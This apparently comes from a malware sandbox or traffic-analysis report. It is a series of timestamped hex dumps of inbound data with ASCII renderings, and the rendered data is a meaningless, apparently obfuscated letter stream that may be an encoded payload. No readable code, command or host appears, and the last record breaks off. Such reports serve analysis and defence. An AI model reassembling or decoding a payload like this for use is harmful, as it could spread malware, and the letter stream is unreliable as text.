2021-10-29 18:50:16 UTC	1821	IN	Data Raw: 20 59 4b 20 6b 4b 20 4f 4f 59 20 4f 4f 74 20 4f 78 4b 20 6b 4f 20 59 78 20 4b 6b 20 59 4f 20 59 4b 20 6f 78 6f 20 4b 51 20 4f 4f 74 20 4f 78 51 20 4f 4f 45 20 59 78 20 4f 74 4b 20 4f 4f 45 20 59 6f 20 6b 4b 20 4f 4f 59 20 4f 4f 74 20 45 4f 20 51 6f 20 59 78 20 4f 52 20 4b 6b 20 59 4b 20 6b 6f 20 4f 78 59 20 4f 4f 74 20 74 74 20 4f 4f 59 20 59 78 20 6f 78 6f 20 45 4f 20 59 4b 20 6b 4b 20 4f 4f 6b 20 4f 4f 74 20 6f 4b 4b 20 74 6f 20 59 78 20 4b 6b 20 59 4f 20 59 4b 20 6f 4f 45 20 51 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 4b 20 59 78 20 4f 4b 59 20 4f 78 20 59 4b 20 6b 4b 20 4f 4f 59 20 4f 4f 74 20 51 78 20 59 78 20 59 78 20 4b 6b 20 4b 6b 20 59 4b 20 6f 4b 6b 20 59 78 20 4f 4f 74 20 4f 78 51 20 4f 4f 59 20 59 78 20 4f 4b 6b 20 4f 4f 4b 20 59 4b 20 6b 4b 20 4f Data Ascii: YK kK OOY OOt OxK kO Yx Kk YO YK oxo KQ OOt OxQ OOE Yx OtK OOE Yo kK OOY OOt EO Qo Yx OR Kk YK ko OxY OOt tt OOY Yx oxo EO YK kK OOk OOt oKK to Yx Kk YO YK oOE QK OOt OxQ OOK Yx OKY Ox YK kK OOY OOt Qx Yx Yx Kk Kk YK oKk Yx OOt OxQ OOY Yx OKk OOK YK kK O
2021-10-29 18:50:16 UTC	1825	IN	Data Raw: 4f 59 51 20 4f 78 20 59 4b 20 6b 4b 20 4f 4f 45 20 4f 4f 74 20 74 6f 20 74 6b 20 59 78 20 4b 6b 20 59 4f 20 59 4b 20 52 4f 20 51 45 20 4f 4f 74 20 4f 78 51 20 4f 4f 4b 20 59 78 20 4f 59 51 20 4f 78 20 59 4b 20 6b 4b 20 4f 4f 45 20 4f 4f 74 20 74 6f 20 74 6b 20 59 78 20 4b 6b 20 59 4f 20 59 4b 20 52 4f 20 51 45 20 4f 4f 74 20 4f 78 51 20 4f 4f 4b 20 59 78 20 4f 59 51 20 4f 78 20 59 4b 20 6b 4b 20 4f 4f 45 20 4f 4f 74 20 74 6f 20 74 6b 20 59 78 20 4b 6b 20 59 4f 20 59 4b 20 52 4f 20 51 45 20 4f 4f 74 20 4f 78 51 20 4f 4f 4b 20 59 78 20 4f 59 51 20 4f 78 20 59 4b 20 6b 4b 20 4f 4f 45 20 4f 4f 74 20 74 6f 20 74 6b 20 59 78 20 4b 6b 20 59 4f 20 59 4b 20 52 4f 20 51 45 20 4f 4f 74 20 4f 78 51 20 4f 4f 4b 20 59 78 20 4f 59 51 20 4f 78 20 59 4b 20 6b 4b 20 4f 4f Data Ascii: OYQ Ox YK kK OOE OOt to tk Yx Kk YO YK RO QE OOt OxQ OOK Yx OYQ Ox YK kK OOE OOt to tk Yx Kk YO YK RO QE OOt OxQ OOK Yx OYQ Ox YK kK OOE OOt to tk Yx Kk YO YK RO QE OOt OxQ OOK Yx OYQ Ox YK kK OOE OOt to tk Yx Kk YO YK RO QE OOt OxQ OOK Yx OYQ Ox YK kK OO
2021-10-29 18:50:16 UTC	1830	IN	Data Raw: 20 6b 74 20 59 78 20 4b 6b 20 59 4f 20 59 4b 20 4f 51 20 6b 59 20 4f 4f 74 20 4f 78 51 20 4f 4f 45 20 59 78 20 4f 4f 51 20 6f 4f 20 59 4b 20 6b 4b 20 4f 4f 59 20 4f 4f 74 20 4b 6f 20 6b 74 20 59 78 20 4b 6b 20 59 4f 20 59 4b 20 4f 51 20 6b 59 20 4f 4f 74 20 4f 78 51 20 4f 4f 45 20 59 78 20 4f 4f 51 20 6f 4f 20 59 4b 20 6b 4b 20 4f 4f 59 20 4f 4f 74 20 4b 6f 20 6b 74 20 59 78 20 4b 6b 20 59 4f 20 59 4b 20 4f 51 20 6b 59 20 4f 4f 74 20 4f 78 51 20 4f 4f 45 20 59 78 20 4f 4f 51 20 6f 4f 20 59 4b 20 6b 4b 20 4f 4f 59 20 4f 4f 74 20 4b 6f 20 6b 74 20 59 78 20 4b 6b 20 59 4f 20 59 4b 20 4f 51 20 6b 59 20 4f 4f 74 20 4f 78 51 20 4f 4f 45 20 59 78 20 4f 4f 51 20 6f 4f 20 59 4b 20 6b 4b 20 4f 4f 59 20 4f 4f 74 20 4b 6f 20 6b 74 20 59 78 20 4b 6b 20 59 4f 20 59 4b Data Ascii: kt Yx Kk YO YK OQ kY OOt OxQ OOE Yx OOQ oO YK kK OOY OOt Ko kt Yx Kk YO YK OQ kY OOt OxQ OOE Yx OOQ oO YK kK OOY OOt Ko kt Yx Kk YO YK OQ kY OOt OxQ OOE Yx OOQ oO YK kK OOY OOt Ko kt Yx Kk YO YK OQ kY OOt OxQ OOE Yx OOQ oO YK kK OOY OOt Ko kt Yx Kk YO YK
2021-10-29 18:50:16 UTC	1834	IN	Data Raw: 59 59 20 4b 6b 20 52 6b 20 51 20 4f 6f 78 20 4f 4f 4b 20 51 74 20 4f 78 51 20 6f 4b 78 20 52 20 51 20 59 78 20 74 4f 20 6b 59 20 6f 4b 6f 20 52 59 20 4b 74 20 4f 4f 6f 20 74 59 20 4b 51 20 4f 6b 6b 20 6f 20 6b 59 20 4f 4f 4b 20 4f 52 4b 20 4f 78 6b 20 6f 59 4b 20 52 20 4b 51 20 59 78 20 4f 6b 45 20 6b 52 20 6f 59 6f 20 52 59 20 4f 78 6b 20 4f 4f 6f 20 4f 6b 74 20 59 78 20 4f 6b 6b 20 6f 20 6b 59 20 4f 4f 4b 20 6f 6f 6b 20 4f 4f 4f 20 6f 59 4b 20 52 20 4b 51 20 59 78 20 4f 74 59 20 6b 52 20 6f 59 6f 20 52 59 20 4f 78 6b 20 4f 4f 6f 20 4f 59 59 20 59 78 20 4f 6b 6b 20 6f 20 6b 59 20 4f 4f 4b 20 4f 78 59 20 4f 78 51 20 6f 59 4b 20 52 20 4b 51 20 59 78 20 4f 6b 20 6b 4b 20 6f 59 6f 20 52 59 20 6f 59 20 4f 4f 6f 20 4f 45 51 20 59 78 20 51 6b 20 4f 4f 20 4b 52 Data Ascii: YY Kk Rk Q Oox OOK Qt OxQ oKx R Q Yx tO kY oKo RY Kt OOo tY KQ Okk o kY OOK ORK Oxk oYK R KQ Yx OkE kR oYo RY Oxk OOo Okt Yx Okk o kY OOK ook OOO oYK R KQ Yx OtY kR oYo RY Oxk OOo OYY Yx Okk o kY OOK OxY OxQ oYK R KQ Yx Ok kK oYo RY oY OOo OEQ Yx Qk OO KR
2021-10-29 18:50:16 UTC	1838	IN	Data Raw: 20 6f 59 4b 20 52 20 4b 51 20 59 78 20 4f 78 20 6b 4b 20 45 4b 20 6b 59 20 6f 78 6b 20 4f 4f 4b 20 6f 4b 45 20 59 78 20 4f 59 52 20 4f 4f 20 6f 6f 20 4f 6f 6f 20 4b 4f 20 4f 78 6b 20 45 59 20 4b 4f 20 52 6b 20 59 4f 20 4f 78 20 6b 4b 20 6f 59 6f 20 52 59 20 6f 78 6b 20 4f 4f 4b 20 45 59 20 59 4f 20 4f 4f 74 20 6f 78 20 4f 51 45 20 4f 4f 45 20 4f 74 20 4f 78 6b 20 6f 59 4b 20 52 20 52 6b 20 59 78 20 51 78 20 6b 59 20 6f 4b 6f 20 52 59 20 6b 4b 20 4f 4f 6f 20 74 78 20 4b 51 20 52 6b 20 51 20 4f 4f 59 20 4f 4f 4b 20 51 20 4f 78 6b 20 4f 4f 51 20 4f 4f 6f 20 6f 45 20 59 78 20 74 4b 20 6b 59 20 4f 4f 59 20 6b 6f 20 4f 74 4f 20 4f 6f 78 20 6f 4b 45 20 59 78 20 6f 45 4b 20 4f 78 20 4f 59 51 20 4f 6f 6f 20 4f 45 6f 20 4f 4f 4f 20 45 59 20 4f 52 20 4b 6b 20 4b 51 Data Ascii: oYK R KQ Yx Ox kK EK kY oxk OOK oKE Yx OYR OO oo Ooo KO Oxk EY KO Rk YO Ox kK oYo RY oxk OOK EY YO OOt ox OQE OOE Ot Oxk oYK R Rk Yx Qx kY oKo RY kK OOo tx KQ Rk Q OOY OOK Q Oxk OOQ OOo oE Yx tK kY OOY ko OtO Oox oKE Yx oEK Ox OYQ Ooo OEo OOO EY OR Kk KQ
2021-10-29 18:50:16 UTC	1842	IN	Data Raw: 4b 20 52 6f 20 45 78 20 6f 4b 74 20 52 4f 20 6f 78 74 20 6b 4f 20 6b 74 20 74 45 20 51 4b 20 4f 6f 59 20 59 59 20 4b 6b 20 6b 6f 20 59 4b 20 4f 6b 51 20 4f 6f 59 20 4f 4f 6f 20 4f 78 51 20 6f 78 20 59 78 20 6f 4f 51 20 52 4f 20 59 4f 20 6b 4b 20 6f 52 20 4f 4f 74 20 4f 6f 6b 20 4f 6f 74 20 59 59 20 4b 6b 20 51 4b 20 59 4b 20 4f 6b 74 20 4f 6f 59 20 4f 78 45 20 4f 78 51 20 51 45 20 59 4f 20 4f 51 45 20 52 4f 20 45 52 20 6b 4b 20 74 59 20 4f 4f 52 20 4f 59 52 20 4f 6f 74 20 59 6b 20 4b 6b 20 4f 4f 78 20 59 59 20 4f 52 59 20 4f 6f 59 20 4f 6f 59 20 4f 78 51 20 4f 52 20 59 4f 20 4f 51 6b 20 52 4f 20 52 6f 20 6b 4b 20 6f 52 20 4f 4f 52 20 4f 59 52 20 4f 6f 74 20 59 6b 20 4b 6b 20 51 4b 20 59 59 20 4f 52 6f 20 4f 6f 59 20 4f 6f 59 20 4f 78 51 20 78 20 59 4f 20 Data Ascii: K Ro Ex oKt RO oxt kO kt tE QK OoY YY Kk ko YK OkQ OoY OOo OxQ ox Yx oOQ RO YO kK oR OOt Ook Oot YY Kk QK YK Okt OoY OxE OxQ QE YO OQE RO ER kK tY OOR OYR Oot Yk Kk OOx YY ORY OoY OoY OxQ OR YO OQk RO Ro kK oR OOR OYR Oot Yk Kk QK YY ORo OoY OoY OxQ x YO
2021-10-29 18:50:16 UTC	1845	IN	Data Raw: 59 6f 20 4f 78 4f 20 4f 51 59 20 59 78 20 4f 6f 52 20 4b 78 20 4f 4b 51 20 51 6f 20 4b 51 20 4f 4f 74 20 4f 59 59 20 4f 6f 74 20 4f 59 59 20 59 52 20 4f 6f 51 20 59 4b 20 4f 78 20 4f 78 4b 20 4f 6b 6f 20 4f 78 4f 20 59 4f 20 59 78 20 4f 51 6b 20 52 4f 20 6f 59 59 20 51 6f 20 4f 51 45 20 4f 4f 74 20 6b 45 20 4f 78 52 20 6f 78 51 20 59 52 20 4f 4f 45 20 59 4b 20 4f 52 6f 20 4f 6f 59 20 4f 59 52 20 4f 78 4f 20 4f 51 59 20 59 78 20 4f 6f 52 20 4b 78 20 59 45 20 51 45 20 4b 51 20 4f 4f 74 20 4f 59 59 20 4f 6f 74 20 59 4b 20 59 74 20 51 74 20 59 4b 20 4f 52 6f 20 4f 6f 59 20 4f 6f 4b 20 4f 78 78 20 4f 51 59 20 59 78 20 4f 4f 78 20 4b 78 20 45 4f 20 51 45 20 4f 51 45 20 4f 4f 74 20 6b 45 20 4f 78 52 20 4f 6f 45 20 59 74 20 4f 6f 51 20 59 4b 20 6f 52 20 4f 78 4b Data Ascii: Yo OxO OQY Yx OoR Kx OKQ Qo KQ OOt OYY Oot OYY YR OoQ YK Ox OxK Oko OxO YO Yx OQk RO oYY Qo OQE OOt kE OxR oxQ YR OOE YK ORo OoY OYR OxO OQY Yx OoR Kx YE QE KQ OOt OYY Oot YK Yt Qt YK ORo OoY OoK Oxx OQY Yx OOx Kx EO QE OQE OOt kE OxR OoE Yt OoQ YK oR OxK
2021-10-29 18:50:16 UTC	1849	IN	Data Raw: 20 4f 51 6b 20 52 4f 20 4f 59 78 20 4f 4f 4b 20 4b 51 20 4f 4f 74 20 4f 59 59 20 4f 6f 74 20 6f 4b 6f 20 6f 6f 20 4f 4f 45 20 59 4b 20 4f 52 6f 20 4f 6f 59 20 4f 4b 51 20 74 59 20 59 4f 20 59 78 20 4f 51 6b 20 52 4f 20 59 4b 20 4f 4f 59 20 4b 51 20 4f 4f 74 20 4f 59 59 20 4f 6f 74 20 4f 6b 20 6f 45 20 4f 4f 45 20 59 4b 20 4f 52 6f 20 4f 6f 59 20 59 45 20 74 4b 20 59 4f 20 59 78 20 4f 51 6b 20 52 4f 20 4f 6b 6f 20 4f 4f 59 20 4b 51 20 4f 4f 74 20 4f 59 59 20 4f 6f 74 20 4f 4b 52 20 6f 45 20 4f 4f 45 20 59 4b 20 4f 52 6f 20 4f 6f 59 20 4f 6b 4f 20 74 4b 20 59 4f 20 59 78 20 4f 51 6b 20 52 4f 20 6f 4f 4b 20 4f 4f 59 20 4b 51 20 4f 4f 74 20 4f 59 59 20 4f 6f 74 20 59 78 20 6f 4b 20 4f 4f 45 20 59 4b 20 4f 52 6f 20 4f 6f 59 20 6b 59 20 52 51 20 59 4f 20 59 78 Data Ascii: OQk RO OYx OOK KQ OOt OYY Oot oKo oo OOE YK ORo OoY OKQ tY YO Yx OQk RO YK OOY KQ OOt OYY Oot Ok oE OOE YK ORo OoY YE tK YO Yx OQk RO Oko OOY KQ OOt OYY Oot OKR oE OOE YK ORo OoY OkO tK YO Yx OQk RO oOK OOY KQ OOt OYY Oot Yx oK OOE YK ORo OoY kY RQ YO Yx
2021-10-29 18:50:16 UTC	1853	IN	Data Raw: 6f 45 20 4f 4f 6f 20 59 4f 20 4b 6b 20 4b 6f 20 52 4f 20 6b 4b 20 4f 4f 4b 20 4f 4b 20 4f 78 51 20 59 59 20 59 78 20 74 4b 20 59 4f 20 4f 45 59 20 6b 59 20 4f 59 45 20 4f 4f 52 20 4f 6f 59 20 4f 4f 4b 20 6b 20 59 78 20 4f 4f 6b 20 59 6f 20 59 6f 20 4f 4f 6f 20 6f 78 51 20 4f 4f 4f 20 4f 6b 4b 20 4b 6b 20 4f 51 52 20 4b 6b 20 45 74 20 6b 74 20 52 4b 20 4f 4f 6b 20 45 6f 20 4f 4f 59 20 4f 4f 4f 20 59 4f 20 6f 4b 4f 20 59 45 20 4f 74 52 20 4f 4f 45 20 4f 45 6f 20 4f 4f 78 20 4f 4f 51 20 59 4b 20 45 59 20 59 4b 20 4b 6f 20 6b 78 20 52 4b 20 4f 4f 45 20 6b 4b 20 4f 4f 52 20 4f 78 4b 20 59 6f 20 4f 6b 78 20 59 78 20 4f 51 59 20 4f 4f 6b 20 4f 4f 59 20 4f 78 4b 20 4f 6f 6f 20 59 59 20 4b 59 20 59 59 20 4f 78 59 20 6b 4f 20 6f 6f 4b 20 4f 4f 6f 20 6f 4f 74 20 4f Data Ascii: oE OOo YO Kk Ko RO kK OOK OK OxQ YY Yx tK YO OEY kY OYE OOR OoY OOK k Yx OOk Yo Yo OOo oxQ OOO OkK Kk OQR Kk Et kt RK OOk Eo OOY OOO YO oKO YE OtR OOE OEo OOx OOQ YK EY YK Ko kx RK OOE kK OOR OxK Yo Okx Yx OQY OOk OOY OxK Ooo YY KY YY OxY kO ooK OOo oOt O
2021-10-29 18:50:16 UTC	1857	IN	Data Raw: 4b 51 20 59 78 20 51 20 6b 59 20 59 4f 20 4f 4f 74 20 4f 4f 4f 20 4f 4f 6f 20 4f 4f 4b 20 4b 51 20 4f 4f 45 20 59 4b 20 6b 59 20 4f 4f 4b 20 59 6f 20 4f 78 6b 20 59 4f 20 59 78 20 59 78 20 59 78 20 4f 4f 52 20 6b 59 20 59 59 20 4f 4f 74 20 4f 78 6b 20 4f 4f 6f 20 4f 4f 45 20 4b 51 20 4f 4f 51 20 59 4b 20 6b 52 20 4f 4f 4b 20 4b 6b 20 4f 78 6b 20 59 59 20 59 78 20 4b 51 20 59 78 20 4f 4f 6f 20 6b 59 20 59 45 20 4f 4f 74 20 4f 4f 4f 20 4f 4f 6f 20 4f 4f 74 20 4b 51 20 4f 6f 45 20 59 4b 20 6b 59 20 4f 4f 4b 20 52 4f 20 4f 78 6b 20 59 74 20 59 78 20 59 78 20 59 78 20 4f 6f 74 20 6b 59 20 59 74 20 4f 4f 74 20 4f 78 6b 20 4f 4f 6f 20 4f 6f 78 20 4b 51 20 4f 6f 4f 20 59 4b 20 6b 52 20 4f 4f 4b 20 45 52 20 4f 78 6b 20 52 4f 20 59 78 20 4b 51 20 59 78 20 4f 78 78 Data Ascii: KQ Yx Q kY YO OOt OOO OOo OOK KQ OOE YK kY OOK Yo Oxk YO Yx Yx Yx OOR kY YY OOt Oxk OOo OOE KQ OOQ YK kR OOK Kk Oxk YY Yx KQ Yx OOo kY YE OOt OOO OOo OOt KQ OoE YK kY OOK RO Oxk Yt Yx Yx Yx Oot kY Yt OOt Oxk OOo Oox KQ OoO YK kR OOK ER Oxk RO Yx KQ Yx Oxx
2021-10-29 18:50:16 UTC	1862	IN	Data Raw: 4f 51 74 20 4f 4f 59 20 4f 4f 74 20 6f 4f 4b 20 4f 4f 6f 20 6f 59 4b 20 4f 52 4f 20 59 4f 20 59 4b 20 6f 45 6f 20 4f 4f 4b 20 4f 52 51 20 6f 59 6f 20 4f 4f 45 20 59 78 20 4f 4b 4f 20 59 78 20 4f 51 4b 20 4f 51 74 20 4f 4f 59 20 4f 4f 74 20 6f 4f 4f 20 4f 4f 6f 20 59 4b 20 4f 52 6f 20 59 4f 20 59 4b 20 6f 45 59 20 4f 4f 4b 20 4f 6f 4f 20 6f 59 59 20 4f 4f 45 20 59 78 20 6f 4b 78 20 59 78 20 4b 6f 20 4f 51 6b 20 4f 4f 59 20 4f 4f 74 20 4f 74 6f 20 4f 4f 6f 20 4f 4b 20 4f 52 6f 20 59 4f 20 59 4b 20 4f 59 78 20 4f 4f 4b 20 45 45 20 6f 59 59 20 4f 4f 45 20 59 78 20 6f 4b 45 20 59 78 20 52 52 20 4f 51 6b 20 4f 4f 59 20 4f 4f 74 20 4f 52 51 20 4f 4f 6f 20 4f 59 78 20 4f 52 6f 20 59 4f 20 59 4b 20 4f 4b 59 20 4f 4f 4b 20 4f 74 74 20 6f 59 4b 20 4f 4f 45 20 59 78 Data Ascii: OQt OOY OOt oOK OOo oYK ORO YO YK oEo OOK ORQ oYo OOE Yx OKO Yx OQK OQt OOY OOt oOO OOo YK ORo YO YK oEY OOK OoO oYY OOE Yx oKx Yx Ko OQk OOY OOt Oto OOo OK ORo YO YK OYx OOK EE oYY OOE Yx oKE Yx RR OQk OOY OOt ORQ OOo OYx ORo YO YK OKY OOK Ott oYK OOE Yx
2021-10-29 18:50:16 UTC	1866	IN	Data Raw: 20 4b 6f 20 52 6f 20 4b 20 6b 45 20 52 6b 20 51 4f 20 6b 59 20 6f 4f 20 78 20 74 20 4f 6f 20 51 20 4f 6f 45 20 51 4b 20 51 4f 20 52 52 20 78 20 4f 4f 20 59 20 6b 20 45 59 20 51 4f 20 74 4b 20 6b 74 20 4f 4f 20 4f 78 6f 20 74 4b 20 52 59 20 51 45 20 4f 4f 6f 20 4f 78 51 20 4f 4f 4f 20 51 74 20 52 52 20 59 45 20 52 20 6f 6b 20 4f 4b 20 4b 51 20 52 4b 20 52 52 20 6b 45 20 74 51 20 6f 51 20 6f 6b 20 6f 6b 20 6f 59 20 45 52 20 74 59 20 52 4b 20 6b 74 20 4f 78 4f 20 52 4f 20 6b 20 4f 52 20 6b 78 20 52 6b 20 6f 20 4b 6b 20 59 20 4f 20 6f 4f 20 74 59 20 52 74 20 6b 59 20 52 74 20 4f 4f 52 20 4f 4f 45 20 4f 4f 52 20 4b 20 4f 74 20 4b 51 20 74 52 20 4b 78 20 59 4f 20 4f 20 4f 4f 52 20 4f 4f 59 20 4f 4f 52 20 6f 45 20 52 52 20 74 52 20 4b 4f 20 52 74 20 4f 20 4f 4f Data Ascii: Ko Ro K kE Rk QO kY oO x t Oo Q OoE QK QO RR x OO Y k EY QO tK kt OO Oxo tK RY QE OOo OxQ OOO Qt RR YE R ok OK KQ RK RR kE tQ oQ ok ok oY ER tY RK kt OxO RO k OR kx Rk o Kk Y O oO tY Rt kY Rt OOR OOE OOR K Ot KQ tR Kx YO O OOR OOY OOR oE RR tR KO Rt O OO
2021-10-29 18:50:16 UTC	1877	IN	Data Raw: 45 20 4f 6f 45 20 6b 6b 20 52 4f 20 52 20 45 45 20 6f 78 20 78 20 6b 74 20 51 51 20 51 4f 20 74 52 20 4b 51 20 74 51 20 52 59 20 6b 59 20 4f 4f 6f 20 45 20 4f 4f 45 20 59 20 4f 59 20 4f 78 51 20 52 59 20 74 52 20 4b 4b 20 59 45 20 4f 4f 52 20 4f 4f 6b 20 45 20 78 20 4f 78 4f 20 59 59 20 52 4b 20 6b 6b 20 74 4f 20 4f 4f 6b 20 78 20 78 20 4f 4f 74 20 6f 6f 20 52 59 20 52 52 20 4b 52 20 59 6f 20 4f 4f 20 4f 4f 45 20 4f 78 20 74 20 4f 78 4f 20 59 4f 20 59 59 20 4b 52 20 4b 51 20 4f 4f 52 20 4b 20 74 20 4f 4b 20 6b 4b 20 4b 59 20 4b 6f 20 52 6f 20 4b 20 6b 45 20 52 6b 20 51 4f 20 6b 59 20 6f 4f 20 78 20 74 20 4f 6f 20 51 20 4f 6f 45 20 51 4b 20 51 4f 20 52 52 20 78 20 4f 4f 20 59 20 6b 20 45 59 20 51 4f 20 74 4b 20 6b 74 20 4f 4f 20 51 74 20 74 4b 20 4f 4f 74 Data Ascii: E OoE kk RO R EE ox x kt QQ QO tR KQ tQ RY kY OOo E OOE Y OY OxQ RY tR KK YE OOR OOk E x OxO YY RK kk tO OOk x x OOt oo RY RR KR Yo OO OOE Ox t OxO YO YY KR KQ OOR K t OK kK KY Ko Ro K kE Rk QO kY oO x t Oo Q OoE QK QO RR x OO Y k EY QO tK kt OO Qt tK OOt
2021-10-29 18:50:16 UTC	1882	IN	Data Raw: 20 4f 4f 45 20 78 20 6f 4f 20 74 78 20 52 74 20 4b 78 20 52 51 20 4f 4f 45 20 45 20 4f 4f 45 20 4f 4f 59 20 51 74 20 52 59 20 4b 6b 20 51 45 20 4b 51 20 4f 4f 51 20 52 20 4f 4f 6f 20 4f 4f 51 20 4f 74 20 59 59 20 52 52 20 51 78 20 52 6b 20 4b 20 4f 4f 52 20 59 78 20 6b 59 20 59 4b 20 59 4f 20 59 6f 20 4b 4f 20 4f 4f 6f 20 4b 20 45 20 74 20 59 20 6f 6f 20 52 6b 20 74 74 20 6b 59 20 59 78 20 4f 4f 20 51 20 4f 4f 59 20 59 20 51 74 20 74 78 20 74 78 20 6b 4b 20 52 74 20 78 20 4f 4f 45 20 4f 4f 59 20 74 20 4f 78 6f 20 52 51 20 4b 51 20 4b 4b 20 4b 51 20 6f 20 4f 4f 74 20 52 20 4f 4b 20 4f 6b 20 4b 6b 20 59 4b 20 51 4f 20 52 6b 20 4b 20 4f 4f 4b 20 4f 4f 6f 20 4f 4f 4b 20 6b 4b 20 4b 6b 20 52 4b 20 4b 74 20 52 6b 20 4f 4f 52 20 4f 4f 45 20 78 20 59 20 51 6b 20 Data Ascii: OOE x oO tx Rt Kx RQ OOE E OOE OOY Qt RY Kk QE KQ OOQ R OOo OOQ Ot YY RR Qx Rk K OOR Yx kY YK YO Yo KO OOo K E t Y oo Rk tt kY Yx OO Q OOY Y Qt tx tx kK Rt x OOE OOY t Oxo RQ KQ KK KQ o OOt R OK Ok Kk YK QO Rk K OOK OOo OOK kK Kk RK Kt Rk OOR OOE x Y Qk
2021-10-29 18:50:16 UTC	1898	IN	Data Raw: 6b 4f 20 6b 4f 20 74 78 20 6b 45 20 52 20 6f 45 20 6f 6f 20 4b 20 78 20 51 4f 20 6b 59 20 51 6f 20 52 52 20 6f 45 20 45 78 20 6f 6b 20 6b 20 45 78 20 74 78 20 4f 4f 59 20 52 4b 20 6b 45 20 4b 6b 20 6f 45 20 6f 74 20 6f 59 20 6f 59 20 6b 45 20 51 6f 20 59 78 20 6b 59 20 59 4b 20 52 6f 20 6f 78 20 4f 59 20 6f 4f 20 51 4b 20 4b 6b 20 52 52 20 6b 4b 20 6f 4b 20 4f 51 20 6f 45 20 6b 20 6f 6b 20 59 78 20 51 51 20 74 59 20 52 51 20 45 6f 20 6f 45 20 6f 4b 20 52 74 20 45 59 20 6b 74 20 52 52 20 52 6b 20 51 59 20 59 59 20 6f 45 20 59 52 20 6f 20 6f 78 20 6b 74 20 51 6f 20 59 78 20 4f 4f 74 20 45 6b 20 6f 45 20 6f 78 20 6f 59 20 6f 4f 20 4f 4f 45 20 6b 6b 20 6b 45 20 6b 6b 20 59 6b 20 6f 45 20 6f 59 20 4f 78 51 20 59 74 20 4f 4f 45 20 51 6f 20 51 4f 20 6b 45 20 59 Data Ascii: kO kO tx kE R oE oo K x QO kY Qo RR oE Ex ok k Ex tx OOY RK kE Kk oE ot oY oY kE Qo Yx kY YK Ro ox OY oO QK Kk RR kK oK OQ oE k ok Yx QQ tY RQ Eo oE oK Rt EY kt RR Rk QY YY oE YR o ox kt Qo Yx OOt Ek oE ox oY oO OOE kk kE kk Yk oE oY OxQ Yt OOE Qo QO kE Y
2021-10-29 18:50:16 UTC	1909	IN	Data Raw: 20 51 4f 20 52 6b 20 4f 6f 59 20 74 78 20 45 6f 20 6f 74 20 6f 52 20 45 20 45 20 59 78 20 4f 6f 59 20 6b 74 20 52 51 20 45 51 20 4f 51 20 4f 6b 20 6b 20 59 78 20 51 45 20 74 6f 20 4f 4f 6f 20 52 74 20 45 6f 20 52 20 6f 52 20 45 20 45 20 59 78 20 52 74 20 6b 74 20 6b 74 20 45 6b 20 4f 74 20 6f 51 20 52 4f 20 4f 74 20 74 78 20 52 6b 20 6b 74 20 52 6b 20 59 6b 20 4f 20 4f 4f 74 20 6f 51 20 4f 74 20 74 78 20 52 6b 20 6b 74 20 52 6b 20 59 6b 20 4f 20 4f 4f 74 20 4b 6f 20 6f 4f 20 74 78 20 4f 4f 52 20 6b 74 20 52 4b 20 52 4f 20 4f 74 20 4f 52 20 4b 52 20 4f 74 20 52 52 20 52 74 20 59 78 20 4f 4f 45 20 4b 51 20 52 20 59 4b 20 4f 6f 20 78 20 52 59 20 4b 6b 20 6b 4b 20 52 52 20 45 52 20 4f 20 4f 4f 74 20 4f 78 20 6f 4f 20 74 78 20 4f 4f 4f 20 4f 4f 45 20 51 4b 20 Data Ascii: QO Rk OoY tx Eo ot oR E E Yx OoY kt RQ EQ OQ Ok k Yx QE to OOo Rt Eo R oR E E Yx Rt kt kt Ek Ot oQ RO Ot tx Rk kt Rk Yk O OOt oQ Ot tx Rk kt Rk Yk O OOt Ko oO tx OOR kt RK RO Ot OR KR Ot RR Rt Yx OOE KQ R YK Oo x RY Kk kK RR ER O OOt Ox oO tx OOO OOE QK
2021-10-29 18:50:16 UTC	1925	IN	Data Raw: 4b 20 59 4b 20 45 4b 20 4f 4f 4b 20 6f 6b 20 4f 78 51 20 4f 51 20 59 78 20 6b 59 20 59 78 20 4f 6f 74 20 6b 4b 20 6f 6b 20 4f 4f 74 20 6f 59 20 4f 4f 6f 20 6b 74 20 4b 6b 20 52 4b 20 59 4b 20 59 78 20 4f 4f 4b 20 6f 78 20 4f 78 51 20 4f 51 20 59 78 20 6b 59 20 59 78 20 6f 4b 20 6b 4b 20 59 59 20 4f 4f 74 20 6f 4f 20 4f 4f 6f 20 74 78 20 4b 6b 20 6b 74 20 59 4b 20 59 6b 20 4f 4f 4b 20 52 20 4f 78 51 20 6f 59 20 59 78 20 51 59 20 59 78 20 6b 6b 20 6b 4b 20 4f 4f 4b 20 51 78 20 52 4f 20 4f 4f 6f 20 52 4b 20 4b 6b 20 51 45 20 59 4b 20 59 52 20 4f 4f 4b 20 4f 74 20 4f 78 51 20 59 4f 20 59 78 20 6b 6b 20 59 78 20 6b 74 20 6b 4b 20 78 20 4f 4f 74 20 6f 20 4f 4f 6f 20 74 78 20 4b 6b 20 51 45 20 59 4b 20 59 6b 20 4f 4f 4b 20 45 59 20 4f 78 51 20 45 4f 20 59 78 20 Data Ascii: K YK EK OOK ok OxQ OQ Yx kY Yx Oot kK ok OOt oY OOo kt Kk RK YK Yx OOK ox OxQ OQ Yx kY Yx oK kK YY OOt oO OOo tx Kk kt YK Yk OOK R OxQ oY Yx QY Yx kk kK OOK Qx RO OOo RK Kk QE YK YR OOK Ot OxQ YO Yx kk Yx kt kK x OOt o OOo tx Kk QE YK Yk OOK EY OxQ EO Yx
2021-10-29 18:50:16 UTC	1941	IN	Data Raw: 52 6f 20 45 51 20 45 51 20 6f 4f 6f 20 4f 51 59 20 4f 4f 51 20 51 51 20 4f 6f 52 20 45 6f 20 4f 74 52 20 4f 59 4b 20 59 78 20 4f 4f 52 20 4f 4f 4b 20 4f 78 6f 20 4f 78 6b 20 4f 4f 74 20 59 78 20 4b 51 20 52 78 20 4b 45 20 51 78 20 4f 4f 74 20 4f 4f 4b 20 4f 78 59 20 4f 6f 52 20 45 6f 20 6b 4f 20 52 78 20 59 52 20 74 74 20 4f 4f 74 20 4f 6f 74 20 4f 6f 78 20 51 6b 20 45 4f 20 4b 51 20 45 6f 20 4f 6b 6f 20 6f 59 6f 20 4f 6f 6f 20 51 52 20 4f 6f 4b 20 74 45 20 59 4f 20 52 6f 20 52 78 20 45 52 20 6f 4f 6f 20 6f 4f 6b 20 4f 78 4b 20 51 51 20 4f 6f 78 20 52 78 20 52 6f 20 52 78 20 59 51 20 6b 45 20 4f 4f 45 20 51 52 20 4f 6f 74 20 51 45 20 59 4f 20 45 4b 20 4f 74 6b 20 4f 59 6b 20 51 78 20 51 52 20 6f 4b 59 20 4f 51 74 20 4f 78 4b 20 59 45 20 59 45 20 45 51 20 Data Ascii: Ro EQ 